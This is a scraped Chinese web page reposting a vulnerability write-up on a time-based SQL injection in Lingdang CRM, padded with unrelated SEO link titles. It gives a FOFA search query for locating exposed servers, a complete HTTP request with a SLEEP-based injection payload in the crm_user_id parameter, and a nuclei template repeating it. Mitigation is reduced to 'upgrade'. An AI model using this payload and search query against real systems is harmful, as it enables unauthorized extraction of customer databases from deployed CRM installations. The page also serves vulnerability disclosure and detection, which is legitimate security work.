当前位置: 首页 > news >正文

h5网站怎么做的山西百度推广开户

h5网站怎么做的,山西百度推广开户,阿里云做的网站程序,购物网站是多少文章目录 免责申明漏洞描述搜索语法漏洞复现nuclei修复建议 免责申明 本文章仅供学习与交流,请勿用于非法用途,均由使用者本人负责,文章作者不为此承担任何责任 漏洞描述 灵当CRM系统是一款功能全面、易于使用的客户关系管理(C…

文章目录

    • 免责申明
    • 漏洞描述
    • 搜索语法
    • 漏洞复现
    • nuclei
    • 修复建议

免责申明

本文章仅供学习与交流,请勿用于非法用途,均由使用者本人负责,文章作者不为此承担任何责任

漏洞描述

灵当CRM系统是一款功能全面、易于使用的客户关系管理(CRM)软件,由上海灵当信息科技有限公司开发。该系统专为以销售和服务业务为主的中小型企业设计,旨在帮助这些企业实现销售、服务、财务等一体化管理,提升整体运营效率,在index.php接口存在sql注入漏洞,通过延时注入可以获取数据库的数据

搜索语法

fofa

body="crmcommon/js/jquery/jquery-1.10.1.min.js"

漏洞复现

在这里插入图片描述
payload

GET /crm/WeiXinApp/marketing/index.php?module=WxOrder&action=getOrderList&crm_user_id=1%20AND%20(SELECT%209552%20FROM%20(SELECT(SLEEP(2)))x) HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36

在这里插入图片描述

nuclei

id: template-idinfo:name: Template Nameauthor: '30842'severity: infodescription: descriptionreference:- https://tags: tagshttp:- raw:- |+GET /crm/WeiXinApp/marketing/index.php?module=WxOrder&action=getOrderList&crm_user_id=1%20AND%20(SELECT%209552%20FROM%20(SELECT(SLEEP(2)))x) HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36matchers-condition: andmatchers:- type: wordpart: bodywords:- code- type: statusstatus:- 200

修复建议

升级到最新版本

http://www.yidumall.com/news/83473.html

相关文章:

  • 网站建设结单 优帮云seo优化推广公司
  • 流放之路做装备词缀网站福州关键词搜索排名
  • 网站管理员的联系方式下载百度网盘
  • 湖南关键词排名推广长沙seo服务
  • 业之峰装饰公司简介搜索引擎优化seo优惠
  • 滨海网站建设找哪家好怎样做竞价推广
  • 全国各大知名网站乔拓云智能建站
  • 北京工作室网站建设百度一下你就知道官网网页版
  • 肥猫网站建设杭州seo外包
  • 个人网站可以做哪些内容论文收录网站排名
  • 网站建设公司兴田德润可信赖百度浏览器网页版
  • 德清网站设计河南网站排名优化
  • dede网站后台打不开博客营销案例
  • 珠海市做网站公司磁力宅在线搜种子
  • 郑州市金水区建设局网站seo网页优化培训
  • pub域名怎么做网站成人短期技能培训
  • 视频网站开发难点2024年阳性最新症状
  • 京东建站模板如何营销
  • 淄博张店做网站的公司网络营销策划推广公司
  • 电子商务公司名称起名seo快排软件
  • 兰州网站seo费用宁波正规优化seo价格
  • 网站备份数据库如何在百度上营销
  • 分类 网站模板30个免费货源网站
  • 先做网站还是先做app互联网销售包括哪些
  • 网站建设项目怎么跟进客户网站排名优化课程
  • 生日礼物自己做网站关键词排名手机优化软件
  • 营销型企业网站建设的预算青岛网站建设公司哪家好
  • 网站怎么看是谁做的杭州关键词排名提升
  • 怎样做海外淘宝网站宁波seo链接优化
  • 网站搭建网站管理seo文章外包